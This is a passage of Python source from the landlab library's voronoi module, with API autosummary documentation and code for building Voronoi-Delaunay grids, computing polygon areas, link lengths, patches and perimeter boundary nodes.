+++++++++++++++++++++++++++++++++++++
.. autosummary::
:toctree: generated/
~landlab.grid.voronoi.VoronoiDelaunayGrid.axis_name
~landlab.grid.voronoi.VoronoiDelaunayGrid.axis_units
~landlab.grid.voronoi.VoronoiDelaunayGrid.move_origin
~landlab.grid.voronoi.VoronoiDelaunayGrid.ndim
~landlab.grid.voronoi.VoronoiDelaunayGrid.node_axis_coordinates
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_elements
~landlab.grid.voronoi.VoronoiDelaunayGrid.save
~landlab.grid.voronoi.VoronoiDelaunayGrid.size
Information about nodes
+++++++++++++++++++++++
.. autosummary::
:toctree: generated/
~landlab.grid.voronoi.VoronoiDelaunayGrid.active_link_dirs_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.active_neighbors_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.all_node_azimuths_map
~landlab.grid.voronoi.VoronoiDelaunayGrid.all_node_distances_map
~landlab.grid.voronoi.VoronoiDelaunayGrid.boundary_nodes
~landlab.grid.voronoi.VoronoiDelaunayGrid.calc_distances_of_nodes_to_point
~landlab.grid.voronoi.VoronoiDelaunayGrid.cell_area_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.cell_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.closed_boundary_nodes
~landlab.grid.voronoi.VoronoiDelaunayGrid.core_nodes
~landlab.grid.voronoi.VoronoiDelaunayGrid.downwind_links_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.fixed_gradient_boundary_nodes
~landlab.grid.voronoi.VoronoiDelaunayGrid.fixed_value_boundary_nodes
~landlab.grid.voronoi.VoronoiDelaunayGrid.link_at_node_is_downwind
~landlab.grid.voronoi.VoronoiDelaunayGrid.link_at_node_is_upwind
~landlab.grid.voronoi.VoronoiDelaunayGrid.link_dirs_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.links_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.neighbors_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.node_at_cell
~landlab.grid.voronoi.VoronoiDelaunayGrid.node_at_core_cell
~landlab.grid.voronoi.VoronoiDelaunayGrid.node_at_link_head
~landlab.grid.voronoi.VoronoiDelaunayGrid.node_at_link_tail
~landlab.grid.voronoi.VoronoiDelaunayGrid.node_axis_coordinates
~landlab.grid.voronoi.VoronoiDelaunayGrid.node_is_boundary
~landlab.grid.voronoi.VoronoiDelaunayGrid.node_x
~landlab.grid.voronoi.VoronoiDelaunayGrid.node_y
~landlab.grid.voronoi.VoronoiDelaunayGrid.nodes
~landlab.grid.voronoi.VoronoiDelaunayGrid.nodes_at_patch
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_core_nodes
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_links_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_nodes
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_patches_present_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.open_boundary_nodes
~landlab.grid.voronoi.VoronoiDelaunayGrid.patches_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.patches_present_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.set_nodata_nodes_to_closed
~landlab.grid.voronoi.VoronoiDelaunayGrid.set_nodata_nodes_to_fixed_gradient
~landlab.grid.voronoi.VoronoiDelaunayGrid.status_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.unit_vector_sum_xcomponent_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.unit_vector_sum_ycomponent_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.upwind_links_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.x_of_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.y_of_node
Information about links
+++++++++++++++++++++++
.. autosummary::
:toctree: generated/
~landlab.grid.voronoi.VoronoiDelaunayGrid.active_link_dirs_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.active_links
~landlab.grid.voronoi.VoronoiDelaunayGrid.angle_of_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.angle_of_link_about_head
~landlab.grid.voronoi.VoronoiDelaunayGrid.downwind_links_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.face_at_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.fixed_links
~landlab.grid.voronoi.VoronoiDelaunayGrid.length_of_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.link_at_face
~landlab.grid.voronoi.VoronoiDelaunayGrid.link_at_node_is_downwind
~landlab.grid.voronoi.VoronoiDelaunayGrid.link_at_node_is_upwind
~landlab.grid.voronoi.VoronoiDelaunayGrid.link_dirs_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.links_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.links_at_patch
~landlab.grid.voronoi.VoronoiDelaunayGrid.node_at_link_head
~landlab.grid.voronoi.VoronoiDelaunayGrid.node_at_link_tail
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_active_links
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_fixed_links
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_links
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_links_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_patches_present_at_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.patches_at_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.patches_present_at_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.resolve_values_on_active_links
~landlab.grid.voronoi.VoronoiDelaunayGrid.resolve_values_on_links
~landlab.grid.voronoi.VoronoiDelaunayGrid.status_at_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.unit_vector_xcomponent_at_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.unit_vector_ycomponent_at_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.upwind_links_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.x_of_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.y_of_link
Information about cells
+++++++++++++++++++++++
.. autosummary::
:toctree: generated/
~landlab.grid.voronoi.VoronoiDelaunayGrid.area_of_cell
~landlab.grid.voronoi.VoronoiDelaunayGrid.cell_area_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.cell_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.core_cells
~landlab.grid.voronoi.VoronoiDelaunayGrid.faces_at_cell
~landlab.grid.voronoi.VoronoiDelaunayGrid.node_at_cell
~landlab.grid.voronoi.VoronoiDelaunayGrid.node_at_core_cell
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_cells
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_core_cells
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_faces_at_cell
~landlab.grid.voronoi.VoronoiDelaunayGrid.x_of_cell
~landlab.grid.voronoi.VoronoiDelaunayGrid.y_of_cell
Information about faces
+++++++++++++++++++++++
.. autosummary::
:toctree: generated/
~landlab.grid.voronoi.VoronoiDelaunayGrid.active_faces
~landlab.grid.voronoi.VoronoiDelaunayGrid.face_at_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.faces_at_cell
~landlab.grid.voronoi.VoronoiDelaunayGrid.link_at_face
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_active_faces
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_faces
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_faces_at_cell
~landlab.grid.voronoi.VoronoiDelaunayGrid.width_of_face
~landlab.grid.voronoi.VoronoiDelaunayGrid.x_of_face
~landlab.grid.voronoi.VoronoiDelaunayGrid.y_of_face
Information about patches
+++++++++++++++++++++++++
.. autosummary::
:toctree: generated/
~landlab.grid.voronoi.VoronoiDelaunayGrid.links_at_patch
~landlab.grid.voronoi.VoronoiDelaunayGrid.nodes_at_patch
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_patches
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_patches_present_at_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_patches_present_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.patches_at_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.patches_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.patches_present_at_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.patches_present_at_node
Information about corners
+++++++++++++++++++++++++
.. autosummary::
:toctree: generated/
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_corners
Data Fields in ModelGrid
------------------------
:class:`~.ModelGrid` inherits from the :class:`~.ModelDataFields` class. This
provides `~.ModelGrid`, and its subclasses, with the ability to, optionally,
store data values that are associated with the different types grid elements
(nodes, cells, etc.). In particular, as part of ``ModelGrid.__init__()``,
data field *groups* are added to the `ModelGrid` that provide containers to
put data fields into. There is one group for each of the eight grid elements
(node, cell, link, face, core_node, core_cell, active_link, and active_face).
To access these groups, use the same methods as accessing groups with
`~.ModelDataFields`. ``ModelGrid.__init__()`` adds the following attributes to
itself that provide access to the values groups:
.. autosummary::
:toctree: generated/
:nosignatures:
~landlab.grid.voronoi.VoronoiDelaunayGrid.at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.at_cell
~landlab.grid.voronoi.VoronoiDelaunayGrid.at_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.at_face
~landlab.grid.voronoi.VoronoiDelaunayGrid.at_patch
~landlab.grid.voronoi.VoronoiDelaunayGrid.at_corner
Each of these attributes returns a ``dict``-like object whose keys are value
names as strings and values are numpy arrays that gives quantities at
grid elements.
Create Field Arrays
+++++++++++++++++++
:class:`~.ModelGrid` inherits several useful methods for creating new data
fields and adding new data fields to a ModelGrid instance. Methods to add or
create a new data array follow the ``numpy`` syntax for creating arrays. The
following methods create and, optionally, initialize new arrays. These arrays
are of the correct size but a new field will not be added to the field:
.. autosummary::
:toctree: generated/
:nosignatures:
~landlab.field.grouped.ModelDataFields.empty
~landlab.field.grouped.ModelDataFields.ones
~landlab.field.grouped.ModelDataFields.zeros
Add Fields to a ModelGrid
+++++++++++++++++++++++++
Unlike with the equivalent numpy functions, these do not take a size argument
as the size of the returned arrays is determined from the size of the
ModelGrid. However, the keyword arguments are the same as those of the numpy
equivalents.
The following methods will create a new array and add a reference to that
array to the ModelGrid:
.. autosummary::
:toctree: generated/
:nosignatures:
~landlab.grid.voronoi.VoronoiDelaunayGrid.add_empty
~landlab.grid.voronoi.VoronoiDelaunayGrid.add_field
~landlab.grid.voronoi.VoronoiDelaunayGrid.add_ones
~landlab.grid.voronoi.VoronoiDelaunayGrid.add_zeros
~landlab.grid.voronoi.VoronoiDelaunayGrid.delete_field
~landlab.grid.voronoi.VoronoiDelaunayGrid.set_units
These methods operate in the same way as the previous set except that, in
addition to creating a new array, the newly-created array is added to the
ModelGrid. The calling signature is the same but with the addition of an
argument that gives the name of the new field as a string. The additional
method, :meth:`~.ModelDataFields.add_field`, adds a previously allocated
array to the ModelGrid. If the array is of the incorrect size it will raise
``ValueError``.
Query Fields
++++++++++++
Use the following methods/attributes get information about the stored data
fields:
.. autosummary::
:toctree: generated/
:nosignatures:
~landlab.field.grouped.ModelDataFields.size
~landlab.field.grouped.ModelDataFields.keys
~landlab.field.grouped.ModelDataFields.has_group
~landlab.field.grouped.ModelDataFields.has_field
~landlab.grid.voronoi.VoronoiDelaunayGrid.field_units
~landlab.grid.voronoi.VoronoiDelaunayGrid.field_values
~landlab.field.grouped.ModelDataFields.groups
i.e., call, e.g. mg.has_field('node', 'my_field_name')
# START HERE check that all functions listed below are included above,
# ignore ones that start with underscores(_)
Gradients, fluxes, and divergences on the grid
----------------------------------------------
Landlab is designed to easily calculate gradients in quantities across the
grid, and to construct fluxes and flux divergences from them. Because these
calculations tend to be a little more involved than property lookups, the
methods tend to start with `calc_`.
.. autosummary::
:toctree: generated/
~landlab.grid.voronoi.VoronoiDelaunayGrid.calc_diff_at_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.calc_flux_div_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.calc_grad_at_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.calc_grad_at_patch
~landlab.grid.voronoi.VoronoiDelaunayGrid.calc_net_flux_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.calc_slope_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.calc_slope_at_patch
~landlab.grid.voronoi.VoronoiDelaunayGrid.calc_unit_normal_at_patch
Mappers
-------
These methods allow mapping of values defined on one grid element type onto a
second, e.g., mapping upwind node values onto links, or mean link values onto
nodes.
.. autosummary::
:toctree: generated/
~landlab.grid.voronoi.VoronoiDelaunayGrid.map_downwind_node_link_max_to_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.map_downwind_node_link_mean_to_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.map_link_head_node_to_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.map_link_tail_node_to_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.map_link_vector_sum_to_patch
~landlab.grid.voronoi.VoronoiDelaunayGrid.map_link_vector_to_nodes
~landlab.grid.voronoi.VoronoiDelaunayGrid.map_max_of_link_nodes_to_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.map_max_of_node_links_to_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.map_max_of_patch_nodes_to_patch
~landlab.grid.voronoi.VoronoiDelaunayGrid.map_mean_of_link_nodes_to_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.map_mean_of_patch_nodes_to_patch
~landlab.grid.voronoi.VoronoiDelaunayGrid.map_min_of_link_nodes_to_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.map_min_of_node_links_to_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.map_min_of_patch_nodes_to_patch
~landlab.grid.voronoi.VoronoiDelaunayGrid.map_node_to_cell
~landlab.grid.voronoi.VoronoiDelaunayGrid.map_upwind_node_link_max_to_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.map_upwind_node_link_mean_to_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.map_value_at_downwind_node_link_max_to_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.map_value_at_max_node_to_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.map_value_at_min_node_to_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.map_value_at_upwind_node_link_max_to_node
Boundary condition control
--------------------------
These are the primary properties for getting and setting the grid boundary
conditions. Changes made to :meth:`~.ModelGrid.status_at_node` and
:meth:`~.ModelGrid.status_at_link` will automatically update the conditions
defined at other grid elements.
.. autosummary::
:toctree: generated/
~landlab.grid.voronoi.VoronoiDelaunayGrid.active_faces
~landlab.grid.voronoi.VoronoiDelaunayGrid.active_links
~landlab.grid.voronoi.VoronoiDelaunayGrid.active_neighbors_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.boundary_nodes
~landlab.grid.voronoi.VoronoiDelaunayGrid.closed_boundary_nodes
~landlab.grid.voronoi.VoronoiDelaunayGrid.core_cells
~landlab.grid.voronoi.VoronoiDelaunayGrid.core_nodes
~landlab.grid.voronoi.VoronoiDelaunayGrid.fixed_gradient_boundary_nodes
~landlab.grid.voronoi.VoronoiDelaunayGrid.fixed_links
~landlab.grid.voronoi.VoronoiDelaunayGrid.fixed_value_boundary_nodes
~landlab.grid.voronoi.VoronoiDelaunayGrid.node_at_core_cell
~landlab.grid.voronoi.VoronoiDelaunayGrid.node_is_boundary
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_active_faces
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_active_links
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_core_cells
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_core_nodes
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_fixed_links
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_patches_present_at_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.number_of_patches_present_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.open_boundary_nodes
~landlab.grid.voronoi.VoronoiDelaunayGrid.set_nodata_nodes_to_closed
~landlab.grid.voronoi.VoronoiDelaunayGrid.set_nodata_nodes_to_fixed_gradient
~landlab.grid.voronoi.VoronoiDelaunayGrid.status_at_link
~landlab.grid.voronoi.VoronoiDelaunayGrid.status_at_node
Identifying node subsets
------------------------
These methods are useful in identifying subsets of nodes, e.g., closest node
to a point; nodes at edges.
(None are available for this grid type)
Surface analysis
----------------
These methods permit the kinds of surface analysis that you might expect to
find in GIS software.
.. autosummary::
:toctree: generated/
~landlab.grid.voronoi.VoronoiDelaunayGrid.calc_aspect_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.calc_hillshade_at_node
~landlab.grid.voronoi.VoronoiDelaunayGrid.calc_slope_at_node
Notes
-----
It is important that when creating a new grid class that inherits from
``ModelGrid``, to call ``ModelGrid.__init__()`` in the new grid's
``__init__()``. For example, the new class's __init__ should contain the
following code,
.. code-block:: python
class NewGrid(ModelGrid):
def __init__(self, *args, **kwds):
ModelGrid.__init__(self, **kwds)
# Code that initializes the NewGrid
Without this, the new grid class will not have the ``at_*`` attributes.
"""
import numpy as np
from six.moves import range
from landlab.grid.base import (ModelGrid, CORE_NODE, BAD_INDEX_VALUE,
INACTIVE_LINK)
from landlab.core.utils import (as_id_array, sort_points_by_x_then_y,
argsort_points_by_x_then_y,
anticlockwise_argsort_points)
from .decorators import return_readonly_id_array
from scipy.spatial import Voronoi
def simple_poly_area(x, y):
    """Calculates and returns the area of a 2-D simple polygon.

    Input vertices must be in sequence (clockwise or counterclockwise). *x*
    and *y* are arrays that give the x- and y-axis coordinates of the
    polygon's vertices.

    Parameters
    ----------
    x : ndarray
        x-coordinates of polygon vertices.
    y : ndarray
        y-coordinates of polygon vertices.

    Returns
    -------
    out : float
        Area of the polygon

    Examples
    --------
    >>> import numpy as np
    >>> from landlab.grid.voronoi import simple_poly_area
    >>> x = np.array([3., 1., 1., 3.])
    >>> y = np.array([1.5, 1.5, 0.5, 0.5])
    >>> simple_poly_area(x, y)
    2.0

    If the input coordinate arrays are 2D, calculate the area of each polygon.
    Note that when used in this mode, all polygons must have the same
    number of vertices, and polygon vertices are listed column-by-column.

    >>> x = np.array([[ 3.,  1.,  1.,  3.],
    ...               [-2., -2., -1., -1.]]).T
    >>> y = np.array([[1.5, 1.5, 0.5, 0.5],
    ...               [ 0.,  1.,  2.,  0.]]).T
    >>> simple_poly_area(x, y)
    array([ 2. ,  1.5])
    """
    # Shoelace formula, evaluated vectorially.  Rolling the vertex arrays
    # back by one position pairs each vertex with its cyclic successor, so
    # the wrap-around edge needs no special-casing.  Summing along axis 0
    # handles both the 1D case and the column-per-polygon 2D case.
    x_next = np.roll(x, -1, axis=0)
    y_next = np.roll(y, -1, axis=0)
    return .5 * np.abs(np.sum(x * y_next - x_next * y, axis=0))
def calculate_link_lengths(pts, link_from, link_to):
    """Calculates and returns length of links between nodes.

    Parameters
    ----------
    pts : Nx2 numpy array containing (x,y) values
    link_from : 1D numpy array containing index numbers of nodes at starting
                point ("from") of links
    link_to : 1D numpy array containing index numbers of nodes at ending point
              ("to") of links

    Returns
    -------
    out : ndarray
        1D numpy array containing horizontal length of each link

    Examples
    --------
    >>> import numpy as np
    >>> from landlab.grid.voronoi import calculate_link_lengths
    >>> pts = np.array([[0.,0.],[3.,0.],[3.,4.]]) # 3:4:5 triangle
    >>> lfrom = np.array([0,1,2])
    >>> lto = np.array([1,2,0])
    >>> calculate_link_lengths(pts, lfrom, lto)
    array([ 3.,  4.,  5.])
    """
    # Per-link (dx, dy) displacement vectors, gathered by fancy indexing,
    # followed by the per-row Euclidean norm.
    deltas = pts[link_to] - pts[link_from]
    return np.sqrt(deltas[:, 0] * deltas[:, 0] + deltas[:, 1] * deltas[:, 1])
class VoronoiDelaunayGrid(ModelGrid):
"""
This inherited class implements an unstructured grid in which cells are
Voronoi polygons and nodes are connected by a Delaunay triangulation. Uses
scipy.spatial module to build the triangulation.
Create an unstructured grid from points whose coordinates are given
by the arrays *x*, *y*.
Parameters
----------
x : array_like
x-coordinate of points
y : array_like
y-coordinate of points
reorient_links (optional) : bool
whether to point all links to the upper-right quadrant
Returns
-------
VoronoiDelaunayGrid
A newly-created grid.
Examples
--------
>>> from numpy.random import rand
>>> from landlab.grid import VoronoiDelaunayGrid
>>> x, y = rand(25), rand(25)
>>> vmg = VoronoiDelaunayGrid(x, y) # node_x_coords, node_y_coords
>>> vmg.number_of_nodes
25
>>> import numpy as np
>>> x = [0, 0.1, 0.2, 0.3,
... 1, 1.1, 1.2, 1.3,
... 2, 2.1, 2.2, 2.3,]
>>> y = [0, 1, 2, 3,
... 0, 1, 2, 3,
... 0, 1, 2, 3]
>>> vmg = VoronoiDelaunayGrid(x, y)
>>> vmg.node_x # doctest: +NORMALIZE_WHITESPACE
array([ 0. , 1. , 2. ,
0.1, 1.1, 2.1,
0.2, 1.2, 2.2,
0.3, 1.3, 2.3])
>>> vmg.node_y # doctest: +NORMALIZE_WHITESPACE
array([ 0., 0., 0.,
1., 1., 1.,
2., 2., 2.,
3., 3., 3.])
"""
def __init__(self, x=None, y=None, reorient_links=True, **kwds):
"""
Create a Voronoi Delaunay grid from a set of points.
Create an unstructured grid from points whose coordinates are given
by the arrays *x*, *y*.
Parameters
----------
x : array_like
x-coordinate of points
y : array_like
y-coordinate of points
reorient_links (optional) : bool
whether to point all links to the upper-right quadrant
Returns
-------
VoronoiDelaunayGrid
A newly-created grid.
Examples
--------
>>> from numpy.random import rand
>>> from landlab.grid import VoronoiDelaunayGrid
>>> x, y = rand(25), rand(25)
>>> vmg = VoronoiDelaunayGrid(x, y) # node_x_coords, node_y_coords
>>> vmg.number_of_nodes
25
"""
if (x is not None) and (y is not None):
self._initialize(x, y, reorient_links)
super(VoronoiDelaunayGrid, self).__init__(**kwds)
    def _initialize(self, x, y, reorient_links=True):
        """
        Creates an unstructured grid around the given (x,y) points.

        Builds, in order: node/cell bookkeeping, the Voronoi diagram (cell
        areas), the Delaunay links and faces, link status/lengths, and the
        patch/neighbor data structures.  The statement order matters: later
        steps read attributes set by earlier ones.
        """
        # Coerce the inputs to flat float arrays before any geometry work.
        x = np.asarray(x, dtype=float).reshape((-1, ))
        y = np.asarray(y, dtype=float).reshape((-1, ))
        if x.size != y.size:
            raise ValueError('x and y arrays must have the same size')
        # Make a copy of the points in a 2D array (useful for calls to geometry
        # routines, but takes extra memory space).
        pts = np.zeros((len(x), 2))
        pts[:, 0] = x
        pts[:, 1] = y
        self.pts = sort_points_by_x_then_y(pts)
        x = self.pts[:, 0]
        y = self.pts[:, 1]
        # NODES AND CELLS: Set up information pertaining to nodes and cells:
        #   - number of nodes
        #   - node x, y coordinates
        #   - default boundary status
        #   - interior and boundary nodes
        #   - nodes associated with each cell and active cell
        #   - cells and active cells associated with each node
        #     (or BAD_VALUE_INDEX if none)
        #
        # Assumptions we make here:
        #   - all interior (non-perimeter) nodes have cells (this should be
        #     guaranteed in a Delaunay triangulation, but there may be
        #     special cases)
        #   - all cells are active (later we'll build a mechanism for the user
        #     specify a subset of cells as active)
        #
        self._node_x = x
        self._node_y = y
        [self._node_status, self._core_nodes, self._boundary_nodes] = \
            self._find_perimeter_nodes_and_BC_set(pts)
        [self._cell_at_node, self._node_at_cell] = \
            self._node_to_cell_connectivity(self._node_status,
                                            self.number_of_cells)
        # NOTE(review): active_cell_at_node is computed but never used below.
        active_cell_at_node = self.cell_at_node[self.core_nodes]
        # ACTIVE CELLS: Construct Voronoi diagram and calculate surface area of
        # each active cell.
        vor = Voronoi(self.pts)
        self.vor = vor
        self._area_of_cell = np.zeros(self.number_of_cells)
        for node in self._node_at_cell:
            xv = vor.vertices[vor.regions[vor.point_region[node]], 0]
            yv = vor.vertices[vor.regions[vor.point_region[node]], 1]
            self._area_of_cell[self.cell_at_node[node]] = (
                simple_poly_area(xv, yv))
        # LINKS: Construct Delaunay triangulation and construct lists of link
        # "from" and "to" nodes.
        (self._node_at_link_tail,
         self._node_at_link_head,
         _,
         self._face_width) = \
            self._create_links_and_faces_from_voronoi_diagram(vor)
        self._status_at_link = np.full(len(self._node_at_link_tail),
                                       INACTIVE_LINK, dtype=int)
        # Sort them by midpoint coordinates
        self._sort_links_by_midpoint()
        # Optionally re-orient links so that they all point within upper-right
        # semicircle
        if reorient_links:
            self._reorient_links_upper_right()
        # LINKS: Calculate link lengths
        self._link_length = calculate_link_lengths(self.pts,
                                                   self.node_at_link_tail,
                                                   self.node_at_link_head)
        # LINKS: inlink and outlink matrices
        # SOON TO BE DEPRECATED
        self._setup_inlink_and_outlink_matrices()
        # ACTIVE LINKS: Create list of active links, as well as "from" and "to"
        # nodes of active links.
        self._reset_link_status_list()
        # NODES & LINKS: IDs and directions of links at each node
        self._create_links_and_link_dirs_at_node()
        # LINKS: set up link unit vectors and node unit-vector sums
        self._create_link_unit_vectors()
        # create link x, y:
        self._create_link_face_coords()
        self._create_neighbors()
@property
def number_of_patches(self):
"""Number of patches.
Returns the number of patches over the grid.
LLCATS: PINF
"""
try:
return self._number_of_patches
except AttributeError:
self._create_patches_from_delaunay_diagram(self.pts, self.vor)
return self._number_of_patches
@property
def nodes_at_patch(self):
"""Get the four nodes at the corners of each patch in a regular grid.
LLCATS: PINF NINF CONN
"""
try:
return self._nodes_at_patch
except AttributeError:
self._create_patches_from_delaunay_diagram(self.pts, self.vor)
return self._nodes_at_patch
@property
@return_readonly_id_array
def patches_at_node(self):
"""
Return a (nnodes, max_voronoi_polygon_sides) array of patches at nodes.
The patches are returned in LL standard order (ccw from E), with any
nonexistent patches recorded after the ids of existing faces.
Nonexistent patches are ID'ed as -1.
Examples
--------
>>> from landlab import HexModelGrid
>>> mg = HexModelGrid(3, 3)
>>> mg.patches_at_node # doctest: +SKIP
array([[ 0, 2, -1, -1, -1, -1],
[ 1, 3, 0, -1, -1, -1],
[ 4, 1, -1, -1, -1, -1],
[ 5, 2, -1, -1, -1, -1],
[ 6, 8, 5, 2, 0, 3],
[ 7, 9, 6, 3, 1, 4],
[ 7, 4, -1, -1, -1, -1],
[ 5, 8, -1, -1, -1, -1],
[ 8, 6, 9, -1, -1, -1],
[ 9, 7, -1, -1, -1, -1]])
LLCATS: NINF PINF CONN
"""
try:
return self._patches_at_node
except AttributeError:
self._create_patches_from_delaunay_diagram(self.pts, self.vor)
return self._patches_at_node
@property
@return_readonly_id_array
def links_at_patch(self):
"""Returns the links forming each patch.
Examples
--------
>>> from landlab import HexModelGrid
>>> mg = HexModelGrid(3, 2)
>>> mg.links_at_patch
array([[ 3, 2, 0],
[ 5, 1, 2],
[ 6, 3, 4],
[ 8, 7, 5],
[10, 9, 6],
[11, 8, 9]])
LLCATS: LINF PINF CONN
"""
try:
return self._links_at_patch
except AttributeError:
self._create_patches_from_delaunay_diagram(self.pts, self.vor)
return self._links_at_patch
@property
@return_readonly_id_array
def patches_at_link(self):
"""Returns the patches adjoined to each link.
Examples
--------
>>> from landlab import HexModelGrid
>>> mg = HexModelGrid(3, 2)
>>> mg.patches_at_link
array([[ 0, -1],
[ 1, -1],
[ 0, 1],
[ 0, 2],
[ 2, -1],
[ 1, 3],
[ 2, 4],
[ 3, -1],
[ 3, 5],
[ 4, 5],
[ 4, -1],
[ 5, -1]])
LLCATS: PINF LINF CONN
"""
try:
return self._patches_at_link
except AttributeError:
self._create_patches_from_delaunay_diagram(self.pts, self.vor)
return self._patches_at_link
def _find_perimeter_nodes_and_BC_set(self, pts):
"""
Uses a convex hull to locate the perimeter nodes of the Voronoi grid,
then sets them as fixed value boundary nodes.
It then sets/updates the various relevant node lists held by the grid,
and returns *node_status*, *core_nodes*, *boundary_nodes*.
"""
# Calculate the convex hull for the set of points
from scipy.spatial import ConvexHull
hull = ConvexHull(pts, qhull_options='Qc') # see below why we use 'Qt'
# The ConvexHull object lists the edges that form the hull. We need to
# get from this list of edges the unique set of nodes. To do this, we
# first flatten the list of vertices that make up all the hull edges
# ("simplices"), so it becomes a 1D array. With that, we can use the
# set() function to turn the array into a set, which removes duplicate
# vertices. Then we turn it back into an array, which now contains the
# set of IDs for the nodes that make up the convex hull.
# The next thing to worry about is the fact that the mesh perimeter
# might contain nodes that are co-planar (that is, co-linear in our 2D
# world). For example, if you make a set of staggered points for a
# hexagonal lattice using make_hex_points(), there will be some
# co-linear points along the perimeter. The ones of these that don't
# form convex corners won't be included in convex_hull_nodes, but they
# are nonetheless part of the perimeter and need to be included in
# the list of boundary_nodes. To deal with this, we pass the 'Qt'
# option to ConvexHull, which makes it generate a list of coplanar
# points. We include these in our set of boundary nodes.
convex_hull_nodes = np.array(list(set(hull.simplices.flatten())))
coplanar_nodes = hull.coplanar[:, 0]
boundary_nodes = as_id_array(np.concatenate(
(convex_hull_nodes, coplanar_nodes)))
# Now we'll create the "node_status" array, which contains the code
# indicating whether the node is interior and active (=0) or a
# boundary (=1). This means that all perimeter (convex hull) nodes are
# initially flagged as boundary code 1. An application might wish to
# change this so that, for example, some boundaries are inactive.
node_status = np.zeros(len(pts[:, 0]), dtype=np.int8)
node_status[boundary_nodes] = 1
# It's also useful to have a list of interior nodes
core_nodes = as_id_array(np.where(node_status == 0)[0])
# save the arrays and update the properties
self._node_status = node_status
self._core_cells = np.arange(len(core_nodes), dtype=np.int)
self._node_at_cell = core_nodes
self._boundary_nodes = boundary_nodes
# Return the results
return node_status, core_nodes, boundary_nodes
    def _create_cell_areas_array(self):
        """Set up an array of cell areas.

        Caches ``self.active_cell_areas`` on ``self._cell_areas`` and
        returns it.
        """
